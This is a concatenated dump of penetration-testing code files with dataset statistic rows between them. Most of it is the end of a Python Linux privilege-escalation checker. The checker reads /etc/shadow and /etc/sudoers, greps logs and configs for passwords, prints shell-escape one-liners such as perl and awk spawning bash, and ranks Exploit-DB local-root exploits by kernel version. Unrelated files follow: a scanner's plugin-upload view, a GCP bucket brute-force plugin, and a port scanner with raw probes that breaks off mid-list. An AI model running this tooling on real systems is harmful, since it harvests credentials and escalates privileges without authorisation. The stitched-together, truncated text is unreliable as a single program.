results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the available tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit applicability but may in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
# first check for kernell applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
| 66.742627 | 248 | 0.615071 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-14
# @File : plugin_management.py
# @Desc : ""
import time
import os
from flask import Flask, Blueprint, render_template, request, jsonify
from werkzeug.utils import secure_filename
from bson import ObjectId
from lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.authenticate import login_check
from fuxi.views.modules.scanner.parse_plugin import parse_plugin
from instance import config
ProductionConfig = config.ProductionConfig
app = Flask(__name__)
app.config.from_object(ProductionConfig)
plugin_management = Blueprint('plugin_management', __name__)
tasks_db = db_name_conf()['tasks_db']
asset_db = db_name_conf()['asset_db']
server_db = db_name_conf()['server_db']
subdomain_db = db_name_conf()['subdomain_db']
vul_db = db_name_conf()['vul_db']
plugin_db = db_name_conf()['plugin_db']
# new plugin
@plugin_management.route('/new-asset', methods=['GET', 'POST'])
@login_check
def new_plugin():
pass
@plugin_management.route('/plugin-management', methods=['GET', 'POST'])
@login_check
def plugin_view():
# delete plugin
if request.method == "GET":
if request.args.get("delete"):
plugin_id = request.args.get('delete')
plugin_filename = connectiondb(plugin_db).find_one({"_id": ObjectId(plugin_id)})['plugin_filename']
if connectiondb(plugin_db).delete_one({'_id': ObjectId(plugin_id)}):
try:
os.remove(plugin_filename)
except Exception as e:
raise e
return "success"
else:
return "Warning"
# get plugin info
elif request.args.get("info"):
plugin_id = request.args.get('info')
plugin_info_data = connectiondb(plugin_db).find_one({'_id': ObjectId(plugin_id)})
del plugin_info_data['_id']
if plugin_info_data:
return jsonify(plugin_info_data)
else:
return jsonify({"result": "Warning"})
else:
# default view
plugin_info = connectiondb(plugin_db).find()
return render_template("plugin-management.html", plugin_info=plugin_info)
@plugin_management.route('/plugin-upload', methods=['GET', 'POST'])
@login_check
def plugin_upload():
file_path = app.config.get('POCSUITE_PATH')
file_data = request.files['file']
if file_data:
file_name = "_" + time.strftime("%y%m%d", time.localtime()) + "_" + secure_filename(file_data.filename)
save_path = file_path + file_name
file_data.save(save_path)
try:
new_plugin_info = parse_plugin(save_path)
if new_plugin_info:
db_insert = connectiondb(plugin_db).insert_one(new_plugin_info).inserted_id
if db_insert:
return jsonify({"result": "success"})
else:
return jsonify({"result": "Warning"})
except Exception as e:
print(e)
return "Warning"
| 33.388889 | 111 | 0.603749 |
owtf | """
ACTIVE Plugin for Testing for Open GCP Buckets(OWASP-CL-002)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "GCPBucketBrute for Open GCP Buckets"
def run(PluginInfo):
resource = get_resources("ActiveOpenGCPBuckets")
    # GCPBucketBrute works better when we use the Second Level Domain
domain = resource[0][1]
# Extract Second Level Domain
extract_sld = domain.rsplit(".", 1)
# Replace it in the resource
resource[0][1] = extract_sld[0]
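    # e.g. a hypothetical resource value of "example.com" becomes ["example", "com"]
    # after rsplit(".", 1), so only "example" is substituted into the resource links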
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 26.086957 | 75 | 0.721865 |
PenetrationTestingScripts | #coding=utf-8
__author__ = 'wilson'
import sys
sys.path.append("../")
from comm.config import *
from comm.printers import printPink,printRed,printGreen
import threading
from threading import Thread
from Queue import Queue
import platform
from subprocess import Popen, PIPE
import re
import time
import socket
socket.setdefaulttimeout(10) # set the global default socket timeout to 10 seconds
class portscan():
"""docstring for ClassName"""
def __init__(self,c,user_ports):
self.config=c
self.PROBES =[
'\r\n\r\n',
'GET / HTTP/1.0\r\n\r\n',
'GET / \r\n\r\n',
'\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08',
'\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
'\x03\0\0\x0b\x06\xe0\0\0\0\0\0',
'\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0',
'\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98',
'\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0',
'< NTP/1.2 >\n',
'< NTP/1.1 >\n',
'< NTP/1.0 >\n',
'\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 \0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))',
'\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00',
'\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04',
